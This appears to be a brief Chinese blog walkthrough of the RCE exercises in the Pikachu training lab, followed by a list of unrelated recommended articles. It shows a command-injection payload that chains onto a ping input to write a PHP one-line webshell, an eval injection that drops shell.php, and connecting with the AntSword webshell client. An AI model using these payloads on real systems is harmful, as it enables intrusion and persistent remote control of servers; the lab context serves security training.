Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
蔷薇灵动5 分钟前
放弃与Mythos 拼手速,用零信任与微隔离重铸网络的确定性秩序
网络·安全
IT大白鼠9 分钟前
网络安全领域企业人才需求分析(2026年度)
安全·web安全·需求分析
IpdataCloud12 分钟前
担心IP查询泄露隐私?用离线查询工具安全查IP,数据不出内网
网络协议·tcp/ip·安全
零陵上将军_xdr20 分钟前
Shell流程控制:if/case/for/while让脚本活起来
linux·运维·服务器
XiaoLin laile35 分钟前
私有化企业 IM:重构企业经营数据的内网属地边界
安全·即时通讯·私有化·企业通讯
志栋智能1 小时前
从云端到边缘:无处不在的超自动化巡检需求
运维·自动化
Multipath7121 小时前
急救车上的“信号堡垒”:多链路聚合路由如何让生命连线永不掉线
网络·5g·安全·实时音视频
snpgroupcn1 小时前
如何安全地将SAP归档数据迁移到云端
安全·数据迁移·sap ecc
dust_and_stars1 小时前
Streamlit vs Gradio 完整对比
服务器·python
BJ_Bonree1 小时前
聊点技术 | 从“统一接入“到“统一调度“:重塑可观测平台的数据底座
运维·人工智能·可观测性